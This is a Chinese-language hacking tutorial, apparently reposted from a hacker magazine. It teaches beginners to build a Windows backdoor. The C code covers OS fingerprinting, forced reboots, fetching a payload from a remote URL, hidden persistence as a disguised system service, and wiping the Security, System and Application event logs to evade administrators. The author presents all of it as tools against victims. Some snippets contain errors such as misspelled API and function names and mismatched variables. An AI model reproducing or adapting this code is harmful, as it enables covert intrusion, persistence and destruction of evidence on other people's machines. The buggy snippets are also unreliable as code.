打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
后门编程技术初步

如你所知,现在的TELNET扩展后门太多了,如号称3W的 WinEggDrop、Wolf、WinShell等等。本人热衷于编程,对后门编程技术早就虎视眈眈,于是狂用Google搜索各类后门的源代码,结果收获还真不少!花了几天时间,反复阅读学习这些后门源代码后,豁然发现,原来实现过程这么简单!抱头痛哭为什么自己不早点写出个“如此简单”的后门,否则现在流芳后门界的就是偶啦,呵呵。
痛定思痛,现在偶就把有关编写后门程序的几个简单却又关键的编程技术总结一下,以飨广大初学后门编程的读者。希望大家也可以尽早写出属于自己的后门来。
废话少说,盘点开始了!我们以下实现都是在(WinXp+SP1)+(VC6.0+SP6)下编译通过。
 

技术实现第一步:获得操作系统版本
呵呵,这个好像没什么技术含量。但是,你要知道,获得操作系统版本信息是多么的重要。基本上所有的木马和后门,都离不开操作系统版本的判断。因为Windows 2000/XP和Windows 9X有太大的区别了,这个大家都清楚。即使在Windows 2000和Windows XP下,有时也要区别对待。比如有时进行IPC连接,两者对IPC匿名共享的默认权限是不一样的。甚至同一版本的不同SP包,有时也有很大区别,这在写缓冲区溢出Exploits的时候尤为明显。那么,如何得到一个操作系统的版本信息呢?其实很简单,一个结构,一个函数就可以搞定。
示例代码如下:
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if (osvi.dwPlatformId==VER_PLATFORM_WIN32_WINDOWS)
printf("Win9x\n");
if (osvi.dwPlatformId==VER_PLATFORM_WIN32_NT)
printf("WinNt\n");
可以看到,OSVERSIONINFO结构体里存放着Windows操作系统版本信息,需要注意的是,在调用GetVersionEx之前,必须对osvi.dwOSVersionInfoSize做初始化工作。我们在Win32编程中常常会有类似的结构,都包括了一个结构大小的成员,在调用API之前必须对该成员进行初始化工作,在我们后面要讲到STARTUPINFO结构也同样如此。很多人不了解为什么,其实初始化的作用主要是为了版本控制,以防Microsoft在将来的Win32中扩充该结构。这里,我们只是简单判断了操作系统是Windows 9X还是Windows NT,如果你想得到更详细的信息,比如是Windows 2000还是Windows XP或Windows 2003,可以通过比较OSVERSIONINFO结构的dwMajorVersion和dwMinorVersion成员来得到。如:
if (osvi.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
if (osvi.dwMajorVersion==5&&osvi.dwMinorVersion==0) {
printf("Win2000\n");
}
else if (osvi.dwMajorVersion==5 && osvi.dwMinorVersion==1) {
printf("WinXp\n");
}
else
printf("Win2003\n");
}
如果dwMajorVerison为4,则是Windows NT4.0,为5则为2000以上版本(最新的Longhorn,Microsoft好象不打算改名,据说它的这个值为6),而dwMinorVersion为0,则是Win2000,为1,是Windows Xp,为2,是Windows 2003。至于Windows的Services Packet版本,大家也同样可以得到,这留给读者自己查MSDN了。毛主席说过:自己动手,丰衣足食!想学编程不动动手怎么行?!

技术实现第二步:控制关闭/重启对方主机
这个功能基本上也是所有后门和木马必有的功能之一。你想,能随意操纵对方机器开关,那是多么自豪的一件事,当然,这不是主要目的,我想主要在于控制者在给目标主机放下“机关”程序的时候,必须重启目标机以达到立即运行该“机关”程序的目的。如果没记错的话,黑防以前刊过N多这个功能的实现了吧。为了完整性,我还是简单的介绍一下。就算是给刚入门的或刚开始看黑防的DDMM们学习的资料。示例代码如下:
HANDLE hToken;
LUID luid;
TOKEN_PRIVILEGES tkp;
//以查询和调整特权的访问权限打开当前进程
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, &hToken))
{ //打开失败
printf("OpenProcessToken failed %d\n", GetLastError());
return;
}
//获得本机SE_SHUTDOWN_NAME的本地唯一标识号
if(!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luid))
{
printf("LookupPrivilegeValue failed %d\n", GetLastError());
return;
};
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = luid;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
//提升权限
AdjustTokenPrivileges(&hToken, FALSE, &tkp, sizeof(tkp), NULL, 0);
//重启/关闭系统
ExitWindowEx(EWX_REBOOT|EWX_FORCE, 0);
CloseHandle(hToken);
这里,对于Windows NT/2000以上操作系统,我们必须要使程序获得SE_SHUTDOWN_NAME权限才能成功关闭计算机。ExitWindowEx()函数是用来关闭系统的。如函数成功调用,系统对每个窗口发送WM_QUERYENDSESSION消息,询问窗口所属的程序是否可以被终止。收到此消息的程序应该进行响应,清除环境释放资源,然后返回TRUE表示自己可以被终止。然而调用ExitWindowEx的时候如果指定了EXW_FORCE,则系统强行终止相关的进程并关闭,这样可能导致数据的丢失。对于Windows 9X,呵呵,就简单多了,我们不需要提升权限的步骤,直接调用ExitWindowEx()就可以达到目的(瞧,我们前面的对操作系统进行判断这里就立马产生作用了吧)。

技术实现第三步:从指定的URL下载文件
这是一般网页木马所使用的伎俩,让受害主机定时向控制者提交的网页上查询是否有文件要被下载,如有就下载。这样就使后门或木马的控制者给目标机上传文件多了一种选择,而且这样的方式是比较安全的,因为没有几个被害者或目标机上的防火墙会禁用本地的HTTP下载方式吧?该技术的编程实现就更简单了,核心就是利用了一个函数URLDownLoadToFile(),该函数按位从Internet下载并保存到本地主机上。
下面是示例代码:
HRESULT hResult;
char seps[] = "/"; //分隔符
char *token;
char *file;
char szURL[MAX_PATH]; //存放URL地址
char ExeFile[MAX_PATH];
//演示用途,我们传递一个URL,比如http://www.xxx/backdoor.exe
strcpy(szURL, argv[1]);
token = strtok(szURL, seps);
while(token != NULL)
{
file = token; //循环至最后,我们得到的*file是backdoor.exe
token = strtok(NULL, seps);
}
//获得当前目录路径,比如: C:\Windows\System32
GetCurrentDirectory(MAX_PATH, szExeFile);
strcat(szExeFile, "\\");
strcat(szExeFile, file); //得到文件绝对路径C: \Windows\System32\backdoor.exe

hResult = URLDownloadToFile(0, argv[1], szExeFile, 0, 0);

if(hResult == S_OK) //S_OK表成功
printf("Download file ok\n");
else
printf("Download file failed\n");

呵呵,是不是很简单?我想平时用IE下载东西也只是调用了这么一个函数而已吧?!

技术实现第四步:把后门安装为系统服务
我们安装后门,肯定希望目标主机每次开机都运行我们的后门程序,传统的方式采用修改win.in、system.ini或aoutorun.bat文件的方法,或者就是修改注册表键值 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,自从Windows NT/2000添加了服务的概念以后,很多黑客们便开始利用服务在系统启动时它也启动的特性,达到自启动的目的,而且不容易被发现。
下面我们分别来讨论服务的安装,然后再来实现服务的主体运行程序。
在Windows 2000的Resource kits下有个叫instsrv.exe的小工具,可以用来安装或卸载可执行服务。下面这一段示例代码就可以实现instsrv.exe的编制。
void main()
{
SC_HANDLE hSCManager = NULL, //服务控制管理器句柄
hService = NULL; //服务句柄
char szSysPath[MAX_PATH]={0}, //系统目录路径
szExePath[MAX_PATH]={0}; //我们要把我们后门程序放在这里,一般就是在\\admin$\\system32\里,隐蔽性高

if ((hSCManager = OpenSCManager(NULL, //NULL表明是本地主机
NULL, // 要打开的服务控制管理数据库,默认为空
SC_MANAGER_CREATE_SERVICE//创建权限
))==NULL)
{
pirntf("OpenSCManager failed\n");
return;
}

GetSystemDirectory(szSysPath, MAX_PATH); //获得系统目录,也就是system32里面,隐蔽起来
strcpy(szExePath, szSysPath);
strcat(szExePath, "scuhkr.exe"); //应用程序绝对路径

if ((hService=CreateService(hSCManager, //指向服务控制管理数据库的句柄
"scuhkr", //服务名
"scuhkr backdoor service", //显示用的服务名
SERVICE_ALL_ACCESS, //所有访问权限
SERVICE_WIN32_OWN_PROCESS, //私有类型
SERVICE_DEMAND_START, //自启动类型 SERVICE_ERROR_IGNORE, //忽略错误处理
szExePath, //应用程序路径
NULL,
NULL,
NULL,
NULL,
NULL)) == NULL)
{
printf("%d\n", GetLastError());
return;
}
printf(“Install service successfully\n ”);
CloseServiceHandle(hService); //关闭服务句柄
CloseServiceHandle(hSCManager); //关闭服务管理数据库句柄
}
这里注释已经讲得很清楚了,大家一看就明白,主要利用了两个API:OpenSCManager()用来打开服务系统管理数据库,CreateService()用来创建服务。相关的参数大家可以参考MSDN。这里我们创建了一个服务名为Scuhkr,开机自启动方式的服务,大家同样可以在控制面板->管理工具->服务里看到我们创建的服务。当然,如果是作为后门,可以把服务名改的隐蔽一点,把服务的描述写的吓人一 点,呵呵,看你发挥了(如果是Windows XP,在控制台命令行里,还提供了一个sc.exe的小程序,在你安装完服务后,可以在Shell下输入:“sc qc scuhkr”。呵呵,你会有所发现的,自己赶快动手试试吧)。至于szExePath,我注释为应用程序路径,既可以是后门自身的绝对路径,也可以是我们通过前面HTTP下载的文件所在的绝对路径。对于系统服务级后门的详细描述,可以参看我在第三期的《服务级后门自己动手做》一文。

技术实现第五步:清除系统日志
记得张国立在冯小刚导演的《手机》里,用四川话意味深长的对葛优说过一句话:
“做人要厚道!”,当时开怀大笑! 嘿嘿,要做“黑客”的,厚道…二字…难啊!
我们小时候,哪个没偷吃过家里的什么糖果啊,饼干啊,大家最后一件事是必做的,那就是“偷吃完后抹嘴”。同样,我们利用后门或木马做完“坏”事后,一定要记得删除系统日志,否则,很容易被有经验的系统管理员逮到你的狐狸尾巴,那个时候,后果可大可小哦。
所以,清楚系统日志文件几乎成了后门与木马工具的一个必备功能。下面我们看看先具体的实现代码吧,然后才介绍相关的一些知识。
#include <windows.h>
#include <stdio.h>

BOOL DelLogFile(const char* szLogName)
{
HANDLE hHandle;
BOOL bOk = FALSE;

//打开事件日志文件
hHandle = OpenEventLog(
NULL, //NULL表本地主机
szLogName);//日志文件名
if (!hHandle) {
return FALSE;
}

//清楚事件日志文件
if (ClearEventLog(hHandle, NULL)) {
bOk = TRUE;
}

CloseEventLog(hHandle);

return bOk;
}

void main()
{
char logName[3][16] =
{
"Application", "Security", "System"
};

for (int i=0; i<3; i++)
{
if (DelLogFile(logName[i]))
{
printf("DelLogFile %s Ok\n", logName[i]);
}
}
}

上面的代码我们只利用了两个API函数,OpenEventLog()和ClearEventLog()。哇靠!没那么简单吧?呵呵,就那么简单!是不是很有成就感呢!在2K/XP的%winsystem%\system32\config\目录下存在三个以后缀“.Evt”结尾的文件,分别是AppEvent.Evt, SecEvent.Evt, SysEvent.Evt。大家看到我在main()函数里给logName二维数组赋的初始值吗,刚好分别对应这三个文件,他们的作用如下:
--Application Log-文件包括用2K/XP SECURITY AUTHORITY注册的应用程序产生的信息。
--Security Log-包括有关通过2K/XP可识别安全提供者和客户的系统访问信息。
--System Log包含所有系统相关事件的信息。
可以看到,系统管理员正是利用控制面板?管理工具?事件查看程序eventvwr.exe来跟踪和查找各种重要的信息的。但现在,我们可以轻易的让这些日志咔嚓掉,岂不快哉。当然,要做到万无一失,可能还需要更多的工作,这里就不赘述了。

以上所讨论的都是比较简单的后门技术,其实算不上技术了,充其量只是实现了小功能而已。但是要知道,千里之行,始于足下。对于初学编程而又对后门或木马技术很感兴趣的读者来说,我相信这还是有一定的帮助。呵呵。对喜欢黑客技术而且爱看《黑防》的战友们说一句,“虽然前面的路还很遥远,但我们会继续努力,因为这是一种执着,对黑客技术无限的执着!加油吧…”

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
新手也可以用c/c++写黑科技
C++ 让电脑关机,重启,注销
WINDOWS系统下木马程序的设计与实现
Window关机函数ExitWindowsEx详解 - dwdm - 博客园
XP 和2003的Lsass进程中明文密码
9行代码让windows崩溃 转
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服